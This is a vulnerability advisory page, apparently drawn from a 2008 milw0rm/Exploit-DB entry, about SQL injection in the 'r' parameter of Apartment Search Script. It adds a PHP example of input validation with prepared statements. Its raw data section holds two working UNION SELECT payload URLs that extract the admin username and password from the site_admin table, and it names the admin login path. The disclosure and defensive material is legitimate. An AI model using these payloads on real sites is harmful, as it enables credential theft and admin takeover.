Vendor: Apartment Search Script
By: Crackers_Child
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Apartment Search Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Apartment Search Script SQL Injection Vulnerability

A SQL injection vulnerability exists in Apartment Search Script: the 'r' parameter of listtest.php allows an attacker to execute arbitrary SQL commands. The username and password exploit strings provided use a UNION SELECT to read the admin and password columns of the site_admin table, which gives an attacker access to the admin panel. The admin panel is located at /Site_Admin/.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
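
One way to apply this mitigation to the 'r' parameter, as an added example that is not the vendor's code or part of the original advisory: the value is validated as a positive integer and then bound in a prepared statement. The `listings` table, its columns and the `fetch_listing` helper are hypothetical (the page does not show the real query), the data is constructed, and the script assumes PHP with the PDO SQLite driver.

```php
<?php
declare(strict_types=1);

// Hypothetical schema: the advisory does not show the real query or tables
// behind listtest.php, so `listings` and its columns are assumptions.

/** Return the listing for a raw `r` value, or null if it is rejected or not found. */
function fetch_listing(PDO $db, ?string $rawR): ?array
{
    // 1. Input validation: `r` must be a positive integer and nothing else.
    $id = filter_var($rawR, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterized query: the value is bound as data, never concatenated into SQL.
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE site_admin (admin TEXT, password TEXT)');
$db->exec("INSERT INTO listings VALUES (1, 'Two-bedroom flat')");
$db->exec("INSERT INTO site_admin VALUES ('constructed-admin', 'constructed-hash')");

$inputs = [
    '1',                                                   // legitimate request
    '-1/**/union/**/select/**/1,admin from site_admin/*',  // URL-decoded value from the advisory
    '1abc',                                                // trailing junk after a number
    null,                                                  // parameter missing
];
foreach ($inputs as $raw) {
    $row = fetch_listing($db, $raw);
    printf("%-55s => %s\n", var_export($raw, true),
        $row ? json_encode($row) : 'rejected or not found');
}
```

Only the first input reaches the database; the others fail validation before any SQL is built.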

Exploit-DB raw data:

$ Script        : Apartment Search Script SQL Injection Vulnerability

$ Script Info   : http://www.yourfreeworld.com/script/apartment.asp

$ Script Price  : Only $79

$ Demo          : http://www.downlinegoldmine.com/apartment/

$ Author        : Crackers_Child

$ Contact       : cashr00t@hotmail.com

$ Note          : If we were struck in the back by those skilled at it, what can we do. Like a wounded wolf

$ Note          : We are surrounded by dog traps on every side . . .

$ Username Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*

$ Password Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*

$ Admin Login   : /Site_Admin/ 

$ Greetz        : Milw0rm.Com & All Peace Warriors

# milw0rm.com [2008-04-19]